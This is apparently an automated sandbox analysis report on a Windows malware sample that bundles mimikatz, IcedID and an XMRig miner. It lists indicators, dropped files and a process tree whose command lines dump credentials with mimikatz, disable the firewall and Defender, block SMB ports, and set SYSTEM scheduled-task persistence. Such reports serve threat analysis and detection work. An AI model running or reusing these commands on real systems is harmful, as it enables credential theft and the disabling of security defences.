Analysis
max time kernel: 151s
max time network: 158s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07/05/2024, 05:27

Behavioral task: behavioral1
Sample: 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe
Resource: win7-20240221-en

General
Target: 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe
Size: 7.8MB
MD5: 59cd884d3b145f770bf5c689fd90025f
SHA1: 1334c015b3dfedc9dac1a4d5020f9314476f5f39
SHA256: 6ea8970a7fc929a9d258c028258a3aaadc121f4588f053cbc5a380ca91b67124
SHA512: f98384f5fc9bedaf59b066c5bc8768257587b7201818cc0a16ebb5f2f884a96ae0eda13894d06e7041528b2180b96b22a43328e80d4c24f468dec3d8f47d46b3
SSDEEP: 196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 1356 created 1736 | 1356 | guwlsyl.exe | 38
Contacts a large (18328) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource | yara_rule
behavioral2/memory/3132-137-0x00007FF6D13F0000-0x00007FF6D14DE000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
UPX dump on OEP (original entry point) 38 IoCs
XMRig Miner payload 9 IoCs
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource | yara_rule
behavioral2/memory/4924-0-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/memory/4924-4-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/files/0x0008000000023249-6.dat | mimikatz
behavioral2/memory/3248-8-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/memory/3132-137-0x00007FF6D13F0000-0x00007FF6D14DE000-memory.dmp | mimikatz
Drops file in Drivers directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | guwlsyl.exe
File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
File created | C:\Windows\system32\drivers\etc\hosts | guwlsyl.exe
Modifies Windows Firewall 2 TTPs 2 IoCs
pid | Process
1336 | netsh.exe
1144 | netsh.exe
Sets file execution options in registry 2 TTPs 40 IoCs
description | ioc | Process
All 40 entries are written by guwlsyl.exe under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\. For each of the 20 executables listed below, the subkey is created ("Key created") and its Debugger value is set ("Set value (str)") to "C:\\Windows\\system32\\svchost.exe":
at.exe, bitsadmin.exe, certutil.exe, cscript.exe, icacls.exe, magnify.exe, mshta.exe, netsh.exe, perfmon.exe, powershell.exe, reg.exe, regini.exe, Regsvr32.exe, rundll32.exe, sethc.exe, takeown.exe, taskkill.exe, WinSAT.exe, WmiPrvSE.exe, wscript.exe
Executes dropped EXE 29 IoCs
pid | Process
3248, 1356, 3772, 2804 | guwlsyl.exe
3456 | wpcap.exe
2052 | betzilvlu.exe
3132 | vfshost.exe
3992, 4432, 2936, 1956, 1728, 3960, 2020, 420, 1940, 4532, 3772, 6460, 6668, 6192, 7152, 6212, 4884, 876 | ntaiaautl.exe
2960 | ibyaef.exe
4012 | xohudmc.exe
2248 | tyxtye.exe
688 | itfnybsmt.exe
Loads dropped DLL 12 IoCs
pid | Process
3456 | wpcap.exe (9 entries)
2052 | betzilvlu.exe (3 entries)
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
87 | ifconfig.me
88 | ifconfig.me
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\wpcap.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 | guwlsyl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | guwlsyl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | guwlsyl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | guwlsyl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | guwlsyl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | guwlsyl.exe
File created | C:\Windows\SysWOW64\Packet.dll | wpcap.exe
File created | C:\Windows\system32\Packet.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\tyxtye.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 | guwlsyl.exe
File created | C:\Windows\SysWOW64\tyxtye.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | guwlsyl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | guwlsyl.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | guwlsyl.exe
File created | C:\Windows\SysWOW64\pthreadVC.dll | wpcap.exe
File created | C:\Windows\system32\wpcap.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | guwlsyl.exe
Drops file in Program Files directory 3 IoCs
description | ioc | Process
File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
Drops file in Windows directory 60 IoCs
description | ioc | Process
The 60 entries are grouped by directory below. Every entry is "File created" by guwlsyl.exe unless noted otherwise.

C:\Windows\jetgmbly\
  guwlsyl.exe (created, then opened for modification, by 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe)
  svschost.xml (created; also opened for modification)
  vimpcsvc.xml (created; also opened for modification)
  schoedcl.xml (created; also opened for modification)
  spoolsrv.xml (created; also opened for modification)
  docmicfg.xml (created; also opened for modification)

C:\Windows\ime\
  guwlsyl.exe

C:\Windows\lbtermtbs\Corporate\
  mimilib.dll
  mimidrv.sys
  vfshost.exe
  log.txt (opened for modification by cmd.exe)

C:\Windows\lbtermtbs\upbdrjv\
  swrpwe.exe

C:\Windows\lbtermtbs\etamgyklt\
  wpcap.dll
  wpcap.exe
  Packet.dll (created; also opened for modification)
  scan.bat
  ip.txt
  betzilvlu.exe
  itfnybsmt.exe
  Result.txt (opened for modification by itfnybsmt.exe)

C:\Windows\lbtermtbs\UnattendGC\
  AppCapture32.dll
  AppCapture64.dll
  Shellcode.ini
  schoedcl.xml
  vimpcsvc.xml
  spoolsrv.xml
  docmicfg.xml
  svschost.xml

C:\Windows\lbtermtbs\UnattendGC\specials\
  crli-0.dll, cnli-1.dll, coli-0.dll, exma-1.dll, posh-0.dll, tibe-2.dll, trch-1.dll, trfo-2.dll, tucl-1.dll, ucl.dll, xdvl-0.dll, libxml2.dll, zlib1.dll, libeay32.dll, ssleay32.dll
  docmicfg.exe, vimpcsvc.exe, spoolsrv.exe, svschost.exe, schoedcl.exe
  docmicfg.xml, vimpcsvc.xml, spoolsrv.xml, svschost.xml, schoedcl.xml
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
2700 | sc.exe
4044 | sc.exe
4196 | sc.exe
3132 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource | yara_rule
behavioral2/files/0x0008000000023249-6.dat | nsis_installer_2
behavioral2/files/0x0008000000023264-15.dat | nsis_installer_1
behavioral2/files/0x0008000000023264-15.dat | nsis_installer_2
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4996 | schtasks.exe
1168 | schtasks.exe
4924 | schtasks.exe
Modifies data under HKEY_USERS 45 IoCs
description | ioc | Process | entries
Key created | \REGISTRY\USER\.DEFAULT\Software | ntaiaautl.exe | 1
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals | ntaiaautl.exe | 1
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | ntaiaautl.exe | 18
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | ntaiaautl.exe | 18
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | ntaiaautl.exe | 1
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | guwlsyl.exe | 1
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | guwlsyl.exe | 1
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | guwlsyl.exe | 1
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | guwlsyl.exe | 1
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | guwlsyl.exe | 1
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | guwlsyl.exe | 1
Modifies registry class 14 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ | guwlsyl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" | guwlsyl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ | guwlsyl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" | guwlsyl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ | guwlsyl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" | guwlsyl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ | guwlsyl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" | guwlsyl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ | guwlsyl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" | guwlsyl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ | guwlsyl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" | guwlsyl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ | guwlsyl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" | guwlsyl.exe
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
1612 | PING.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
1356 | guwlsyl.exe (64 entries)
Suspicious behavior: LoadsDriver 15 IoCs
pid | Process
660 | Process not Found (15 entries)
Suspicious behavior: RenamesItself 1 IoCs
pid | Process
4924 | 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe
Suspicious use of AdjustPrivilegeToken 24 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4924 | 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege | 3248, 1356 | guwlsyl.exe
Token: SeDebugPrivilege | 3132 | vfshost.exe
Token: SeDebugPrivilege | 3992, 4432, 2936, 1956, 1728, 3960, 2020, 420, 1940, 4532, 3772, 6460, 6668, 6192, 7152, 6212, 4884, 876 | ntaiaautl.exe
Token: SeLockMemoryPrivilege | 2960 (2 entries) | ibyaef.exe
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe 3248 guwlsyl.exe 3248 guwlsyl.exe 1356 guwlsyl.exe 1356 guwlsyl.exe 4012 xohudmc.exe 2248 tyxtye.exe 3772 guwlsyl.exe 3772 guwlsyl.exe 2804 guwlsyl.exe 2804 guwlsyl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4924 wrote to memory of 1360 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe 93 PID 4924 wrote to memory of 1360 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe 93 PID 4924 wrote to memory of 1360 4924 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe 93 PID 1360 wrote to memory of 1612 1360 cmd.exe 95 PID 1360 wrote to memory of 1612 1360 cmd.exe 95 PID 1360 wrote to memory of 1612 1360 cmd.exe 95 PID 1360 wrote to memory of 3248 1360 cmd.exe 96 PID 1360 wrote to memory of 3248 1360 cmd.exe 96 PID 1360 wrote to memory of 3248 1360 cmd.exe 96 PID 1356 wrote to memory of 2184 1356 guwlsyl.exe 98 PID 1356 wrote to memory of 2184 1356 guwlsyl.exe 98 PID 1356 wrote to memory of 2184 1356 guwlsyl.exe 98 PID 2184 wrote to memory of 2160 2184 cmd.exe 100 PID 2184 wrote to memory of 2160 2184 cmd.exe 100 PID 2184 wrote to memory of 2160 2184 cmd.exe 100 PID 2184 wrote to memory of 4536 2184 cmd.exe 101 PID 2184 wrote to memory of 4536 2184 cmd.exe 101 PID 2184 wrote to memory of 4536 2184 cmd.exe 101 PID 2184 wrote to memory of 2708 2184 cmd.exe 103 PID 2184 wrote to memory of 2708 2184 cmd.exe 103 PID 2184 wrote to memory of 2708 2184 cmd.exe 103 PID 2184 wrote to memory of 372 2184 cmd.exe 105 PID 2184 wrote to memory of 372 2184 cmd.exe 105 PID 2184 wrote to memory of 372 2184 cmd.exe 105 PID 2184 wrote to memory of 2632 2184 cmd.exe 106 PID 2184 wrote to memory of 2632 2184 cmd.exe 106 PID 2184 wrote to memory of 2632 2184 cmd.exe 106 PID 2184 wrote to memory of 940 2184 cmd.exe 107 PID 2184 wrote to memory of 940 2184 cmd.exe 107 PID 2184 wrote to memory of 940 2184 cmd.exe 107 PID 1356 wrote to memory of 4444 1356 guwlsyl.exe 110 PID 1356 wrote to memory of 4444 1356 guwlsyl.exe 110 PID 1356 wrote to memory of 4444 1356 guwlsyl.exe 110 PID 1356 wrote to memory of 4104 1356 guwlsyl.exe 113 PID 1356 wrote to memory of 4104 1356 guwlsyl.exe 113 
PID 1356 wrote to memory of 4104 1356 guwlsyl.exe 113 PID 1356 wrote to memory of 2492 1356 guwlsyl.exe 115 PID 1356 wrote to memory of 2492 1356 guwlsyl.exe 115 PID 1356 wrote to memory of 2492 1356 guwlsyl.exe 115 PID 1356 wrote to memory of 980 1356 guwlsyl.exe 120 PID 1356 wrote to memory of 980 1356 guwlsyl.exe 120 PID 1356 wrote to memory of 980 1356 guwlsyl.exe 120 PID 980 wrote to memory of 3456 980 cmd.exe 122 PID 980 wrote to memory of 3456 980 cmd.exe 122 PID 980 wrote to memory of 3456 980 cmd.exe 122 PID 3456 wrote to memory of 4300 3456 wpcap.exe 123 PID 3456 wrote to memory of 4300 3456 wpcap.exe 123 PID 3456 wrote to memory of 4300 3456 wpcap.exe 123 PID 4300 wrote to memory of 1452 4300 net.exe 125 PID 4300 wrote to memory of 1452 4300 net.exe 125 PID 4300 wrote to memory of 1452 4300 net.exe 125 PID 3456 wrote to memory of 3608 3456 wpcap.exe 126 PID 3456 wrote to memory of 3608 3456 wpcap.exe 126 PID 3456 wrote to memory of 3608 3456 wpcap.exe 126 PID 3608 wrote to memory of 2632 3608 net.exe 128 PID 3608 wrote to memory of 2632 3608 net.exe 128 PID 3608 wrote to memory of 2632 3608 net.exe 128 PID 3456 wrote to memory of 2184 3456 wpcap.exe 129 PID 3456 wrote to memory of 2184 3456 wpcap.exe 129 PID 3456 wrote to memory of 2184 3456 wpcap.exe 129 PID 2184 wrote to memory of 908 2184 net.exe 131 PID 2184 wrote to memory of 908 2184 net.exe 131 PID 2184 wrote to memory of 908 2184 net.exe 131 PID 3456 wrote to memory of 4516 3456 wpcap.exe 132
Processes
Process tree (indented by depth; a "command line" line is shown only where it differs from the image path):

C:\Windows\System32\spoolsv.exe (PID 1736)
  C:\Windows\TEMP\ttltnyvty\ibyaef.exe (PID 2960)
    command line: "C:\Windows\TEMP\ttltnyvty\ibyaef.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe (PID 4924)
  command line: "C:\Users\Admin\AppData\Local\Temp\2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe"
  - Drops file in Windows directory
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe (PID 1360)
    command line: cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jetgmbly\guwlsyl.exe
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\PING.EXE (PID 1612)
      command line: ping 127.0.0.1 -n 5
      - Runs ping.exe
    C:\Windows\jetgmbly\guwlsyl.exe (PID 3248)
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx

C:\Windows\jetgmbly\guwlsyl.exe (PID 1356)
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Sets file execution options in registry
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe (PID 2184)
    command line: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (PID 2160)
      command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 4536)
      command line: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    C:\Windows\SysWOW64\cmd.exe (PID 2708)
      command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 372)
      command line: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    C:\Windows\SysWOW64\cmd.exe (PID 2632)
      command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 940)
      command line: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  C:\Windows\SysWOW64\netsh.exe (PID 4444)
    command line: netsh ipsec static del all
  C:\Windows\SysWOW64\netsh.exe (PID 4104)
    command line: netsh ipsec static add policy name=Bastards description=FuckingBastards
  C:\Windows\SysWOW64\netsh.exe (PID 2492)
    command line: netsh ipsec static add filteraction name=BastardsList action=block
  C:\Windows\SysWOW64\cmd.exe (PID 980)
    command line: cmd /c C:\Windows\lbtermtbs\etamgyklt\wpcap.exe /S
    - Suspicious use of WriteProcessMemory
    C:\Windows\lbtermtbs\etamgyklt\wpcap.exe (PID 3456)
      command line: C:\Windows\lbtermtbs\etamgyklt\wpcap.exe /S
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net.exe (PID 4300)
        command line: net stop "Boundary Meter"
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe (PID 1452)
          command line: C:\Windows\system32\net1 stop "Boundary Meter"
      C:\Windows\SysWOW64\net.exe (PID 3608)
        command line: net stop "TrueSight Meter"
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe (PID 2632)
          command line: C:\Windows\system32\net1 stop "TrueSight Meter"
      C:\Windows\SysWOW64\net.exe (PID 2184)
        command line: net stop npf
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\net1.exe (PID 908)
          command line: C:\Windows\system32\net1 stop npf
      C:\Windows\SysWOW64\net.exe (PID 4516)
        command line: net start npf
        C:\Windows\SysWOW64\net1.exe (PID 864)
          command line: C:\Windows\system32\net1 start npf
  C:\Windows\SysWOW64\cmd.exe (PID 3132)
    command line: cmd /c net start npf
    C:\Windows\SysWOW64\net.exe (PID 1624)
      command line: net start npf
      C:\Windows\SysWOW64\net1.exe (PID 4688)
        command line: C:\Windows\system32\net1 start npf
  C:\Windows\SysWOW64\cmd.exe (PID 1004)
    command line: cmd /c net start npf
    C:\Windows\SysWOW64\net.exe (PID 1600)
      command line: net start npf
      C:\Windows\SysWOW64\net1.exe (PID 4172)
        command line: C:\Windows\system32\net1 start npf
  C:\Windows\SysWOW64\cmd.exe (PID 532)
    command line: cmd /c C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lbtermtbs\etamgyklt\Scant.txt
    C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe (PID 2052)
      command line: C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lbtermtbs\etamgyklt\Scant.txt
      - Executes dropped EXE
      - Loads dropped DLL
  C:\Windows\SysWOW64\cmd.exe (PID 2196)
    command line: cmd /c C:\Windows\lbtermtbs\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lbtermtbs\Corporate\log.txt
    - Drops file in Windows directory
    C:\Windows\lbtermtbs\Corporate\vfshost.exe (PID 3132)
      command line: C:\Windows\lbtermtbs\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 420)
    command line: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tmessluuv" /ru system /tr "cmd /c C:\Windows\ime\guwlsyl.exe"
    C:\Windows\SysWOW64\cmd.exe (PID 1336)
      command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\schtasks.exe (PID 4924)
      command line: schtasks /create /sc minute /mo 1 /tn "tmessluuv" /ru system /tr "cmd /c C:\Windows\ime\guwlsyl.exe"
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\cmd.exe (PID 3000)
    command line: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lewlyngkg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F"
    C:\Windows\SysWOW64\cmd.exe (PID 4856)
      command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\schtasks.exe (PID 1168)
      command line: schtasks /create /sc minute /mo 1 /tn "lewlyngkg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F"
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\cmd.exe (PID 1716)
    command line: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yaubemieu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F"
    C:\Windows\SysWOW64\cmd.exe (PID 4684)
      command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\schtasks.exe (PID 4996)
      command line: schtasks /create /sc minute /mo 1 /tn "yaubemieu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F"
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\netsh.exe (PID 908)
    command line: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  C:\Windows\SysWOW64\netsh.exe (PID 4988)
    command line: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  C:\Windows\SysWOW64\netsh.exe (PID 452)
    command line: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  C:\Windows\SysWOW64\netsh.exe (PID 4672)
    command line: netsh ipsec static set policy name=Bastards assign=y
  C:\Windows\SysWOW64\netsh.exe (PID 468)
    command line: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  C:\Windows\SysWOW64\netsh.exe (PID 760)
    command line: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  C:\Windows\SysWOW64\netsh.exe (PID 2472)
    command line: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  C:\Windows\SysWOW64\netsh.exe (PID 4300)
    command line: netsh ipsec static set policy name=Bastards assign=y
  C:\Windows\SysWOW64\netsh.exe (PID 1192)
    command line: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  C:\Windows\SysWOW64\netsh.exe (PID 4876)
    command line: netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe (PID 3992)
    command line: C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 784 C:\Windows\TEMP\lbtermtbs\784.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\netsh.exe (PID 3080)
    command line: netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  C:\Windows\SysWOW64\netsh.exe (PID 4556)
    command line: netsh ipsec static set policy name=Bastards assign=y
  C:\Windows\SysWOW64\cmd.exe (PID 1048)
    command line: cmd /c net stop SharedAccess
    C:\Windows\SysWOW64\net.exe (PID 3000)
      command line: net stop SharedAccess
      C:\Windows\SysWOW64\net1.exe (PID 4068)
        command line: C:\Windows\system32\net1 stop SharedAccess
  C:\Windows\SysWOW64\cmd.exe (PID 1744)
    command line: cmd /c netsh firewall set opmode mode=disable
    C:\Windows\SysWOW64\netsh.exe (PID 1336)
      command line: netsh firewall set opmode mode=disable
      - Modifies Windows Firewall
  C:\Windows\SysWOW64\cmd.exe (PID 4620)
    command line: cmd /c netsh Advfirewall set allprofiles state off
    C:\Windows\SysWOW64\netsh.exe (PID 1144)
      command line: netsh Advfirewall set allprofiles state off
      - Modifies Windows Firewall
  C:\Windows\SysWOW64\cmd.exe (PID 232)
    command line: cmd /c net stop MpsSvc
    C:\Windows\SysWOW64\net.exe (PID 1020)
      command line: net stop MpsSvc
      C:\Windows\SysWOW64\net1.exe (PID 1768)
        command line: C:\Windows\system32\net1 stop MpsSvc
  C:\Windows\SysWOW64\cmd.exe (PID 532)
    command line: cmd /c net stop WinDefend
    C:\Windows\SysWOW64\net.exe (PID 3308)
      command line: net stop WinDefend
      C:\Windows\SysWOW64\net1.exe (PID 2296)
        command line: C:\Windows\system32\net1 stop WinDefend
  C:\Windows\SysWOW64\cmd.exe (PID 3168)
    command line: cmd /c net stop wuauserv
    C:\Windows\SysWOW64\net.exe (PID 2764)
      command line: net stop wuauserv
      C:\Windows\SysWOW64\net1.exe (PID 2320)
        command line: C:\Windows\system32\net1 stop wuauserv
  C:\Windows\SysWOW64\cmd.exe (PID 1612)
    command line: cmd /c sc config MpsSvc start= disabled
    C:\Windows\SysWOW64\sc.exe (PID 4044)
      command line: sc config MpsSvc start= disabled
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe (PID 732)
    command line: cmd /c sc config SharedAccess start= disabled
    C:\Windows\SysWOW64\sc.exe (PID 2700)
      command line: sc config SharedAccess start= disabled
      - Launches sc.exe
  C:\Windows\SysWOW64\cmd.exe (PID 2908)
    command line: cmd /c sc config WinDefend start= disabled
    C:\Windows\SysWOW64\sc.exe (PID 3132)
      command line: sc config WinDefend start= disabled
      - Launches sc.exe
